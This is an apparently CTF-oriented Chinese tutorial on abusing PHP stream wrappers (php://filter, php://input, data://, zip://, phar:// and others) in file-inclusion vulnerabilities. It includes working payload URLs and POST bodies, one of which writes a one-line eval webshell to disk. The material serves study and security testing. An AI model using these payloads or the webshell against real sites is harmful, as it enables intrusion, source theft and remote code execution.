共计 4791 个字符,预计需要花费 12 分钟才能阅读完成。
参考了这篇文章:php 伪协议实现命令执行的七种姿势,并根据自己理解进行了总结,也算是加深一下印象,方便以后使用。
file://
协议
-
条件:
-
allow_url_fopen
:off/on -
allow_url_include
:off/on
-
-
作用 :
用于访问本地文件系统,在 CTF 中通常用来 读取本地文件 的且不受allow_url_fopen
与allow_url_include
的影响。include()/require()/include_once()/require_once()
参数可控的情况下,如导入为非.php
文件,则仍按照 php 语法进行解析,这是include()
函数所决定的。 -
说明 :
file://
文件系统是 PHP 使用的默认封装协议,展现了本地文件系统。当指定了一个相对路径(不以 /、、\ 或 Windows 盘符开头的路径)提供的路径将基于当前的工作目录。在很多情况下是脚本所在的目录,除非被修改了。使用 CLI 的时候,目录默认是脚本被调用时所在的目录。在某些函数里,例如fopen()
和file_get_contents()
,include_path
会可选地搜索,也作为相对的路径。 -
用法:
/path/to/file.ext relative/path/to/file.ext fileInCwd.ext C:/path/to/winfile.ext C:\path\to\winfile.ext \\smbserver\share\path\to\winfile.ext file:///path/to/file.ext
-
示例:
-
file://[文件的绝对路径和文件名]
http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt
-
[文件的相对路径和文件名]
http://127.0.0.1/include.php?file=./phpinfo.txt
-
[http:// 网络路径和文件名]
http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt
-
- 参考:http://php.net/manual/zh/wrappers.file.php
php://
协议
-
条件:
-
allow_url_fopen
:off/on -
allow_url_include
: 仅php://input php://stdin php://memory php://temp
需要 on
-
-
作用 :
php://
访问各个输入 / 输出流(I/O streams),在 CTF 中经常使用的是php://filter
和php://input
,php://filter
用于 读取源码 ,php://input
用于 执行 php 代码。 -
说明 :
PHP 提供了一些杂项输入 / 输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符,
内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。协议 作用 php://input 可以访问请求的原始数据的只读流,在 POST 请求中访问 POST 的 data
部分,在enctype="multipart/form-data"
的时候php://input
是无效的。php://output 只写的数据流,允许以 print 和 echo 一样的方式写入到输出缓冲区。 php://fd (>=5.3.6)允许直接访问指定的文件描述符。例如 php://fd/3
引用了文件描述符 3。php://memory php://temp (>=5.1.0)一个类似文件包装器的数据流,允许读写临时数据。两者的唯一区别是 php://memory
总是把数据储存在内存中,而php://temp
会在内存量达到预定义的限制后(默认是2MB
)存入临时文件中。临时文件位置的决定和sys_get_temp_dir()
的方式一致。php://filter (>=5.0.0)一种元封装器,设计用于数据流打开时的筛选过滤应用。对于一体式 (all-in-one)
的文件函数非常有用,类似readfile()
、file()
和file_get_contents()
,在数据流内容读取之前没有机会应用其他过滤器。 -
php://filter
参数详解该协议的参数会在该协议路径上进行传递,多个参数都可以在一个路径上传递。具体参考如下:
php://filter 参数 描述 resource=< 要过滤的数据流 > 必须项。它指定了你要筛选过滤的数据流。 read=< 读链的过滤器 > 可选项。可以设定一个或多个过滤器名称,以管道符(*\ *)分隔。 write=< 写链的过滤器 > 可选项。可以设定一个或多个过滤器名称,以管道符(\ )分隔。 <; 两个链的过滤器 > 任何没有以 read= 或 write= 作前缀的筛选器列表会视情况应用于读或写链。 -
可用的过滤器列表(4 类)
此处列举主要的过滤器类型,详细内容请参考:https://www.php.net/manual/zh/filters.php
字符串过滤器 作用 string.rot13 等同于 str_rot13()
,rot13 变换string.toupper 等同于 strtoupper()
,转大写字母string.tolower 等同于 strtolower()
,转小写字母string.strip_tags 等同于 strip_tags()
,去除 html、PHP 语言标签转换过滤器 作用 convert.base64-encode & convert.base64-decode 等同于 base64_encode()
和base64_decode()
,base64 编码解码convert.quoted-printable-encode & convert.quoted-printable-decode quoted-printable 字符串与 8-bit 字符串编码解码 压缩过滤器 作用 zlib.deflate & zlib.inflate 在本地文件系统中创建 gzip 兼容文件的方法,但不产生命令行工具如 gzip 的头和尾信息。只是压缩和解压数据流中的有效载荷部分。 bzip2.compress & bzip2.decompress 同上,在本地文件系统中创建 bz2 兼容文件的方法。 加密过滤器 作用 mcrypt.* libmcrypt 对称加密算法 mdecrypt.* libmcrypt 对称解密算法 -
示例:
-
php://filter/read=convert.base64-encode/resource=[文件名]
读取文件源码(针对 php 文件需要 base64 编码)http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php
-
php://input + [POST DATA]
执行 php 代码http://127.0.0.1/include.php?file=php://input [POST DATA 部分] <?php phpinfo(); ?>
若有写入权限,写入一句话木马
http://127.0.0.1/include.php?file=php://input [POST DATA 部分] <?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>
-
- 参考:https://php.net/manual/zh/wrappers.php.php
zip:// & bzip2:// & zlib://
协议
-
条件:
-
allow_url_fopen
:off/on -
allow_url_include
:off/on
-
-
作用:
zip:// & bzip2:// & zlib://
均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名,可修改为任意后缀:jpg png gif xxx
等等。 -
示例:
-
zip://[压缩文件绝对路径]%23[压缩文件内的子文件名]
(# 编码为 %23)压缩 phpinfo.txt 为 phpinfo.zip,压缩包重命名为 phpinfo.jpg,并上传
http://127.0.0.1/include.php?file=zip://E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt
-
compress.bzip2://file.bz2
压缩 phpinfo.txt 为 phpinfo.bz2 并上传(同样支持任意后缀名)
http://127.0.0.1/include.php?file=compress.bzip2://E:\phpStudy\PHPTutorial\WWW\phpinfo.bz2
-
compress.zlib://file.gz
压缩 phpinfo.txt 为 phpinfo.gz 并上传(同样支持任意后缀名)
http://127.0.0.1/include.php?file=compress.zlib://E:\phpStudy\PHPTutorial\WWW\phpinfo.gz
-
- 参考:http://php.net/manual/zh/wrappers.compression.php
data://
协议
-
条件:
-
allow_url_fopen
:on -
allow_url_include
:on
-
-
作用 :自
PHP>=5.2.0
起,可以使用data://
数据流封装器,以传递相应格式的数据。通常可以用来执行 PHP 代码。 -
用法:
data://text/plain, data://text/plain;base64,
-
示例:
-
data://text/plain,
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
-
data://text/plain;base64,
http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
-
http:// & https://
协议
-
条件:
-
allow_url_fopen
:on -
allow_url_include
:on
-
-
作用:常规 URL 形式,允许通过
HTTP 1.0
的 GET 方法,以只读访问文件或资源。CTF 中通常用于远程包含。 -
用法:
http://example.com http://example.com/file.php?var1=val1&var2=val2 http://user:password@example.com https://example.com https://example.com/file.php?var1=val1&var2=val2 https://user:password@example.com
-
示例:
http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt
phar://
协议
phar://
协议与 zip://
类似,同样可以访问 zip 格式压缩包内容,在这里只给出一个示例:
http://127.0.0.1/include.php?file=phar://E:/phpStudy/PHPTutorial/WWW/phpinfo.zip/phpinfo.txt
另外在 Black Hat 2018 大会上,研究人员公布了一款针对 PHP 应用程序的全新攻击技术:phar:// 协议对象注入技术。
因为该利用点需要满足一定的条件才能利用,可以参考下面这篇文章,里面的 demo 也非常详细,留作以后专门研究一下。
参考文章:seebug – 利用 phar 拓展 php 反序列化漏洞攻击面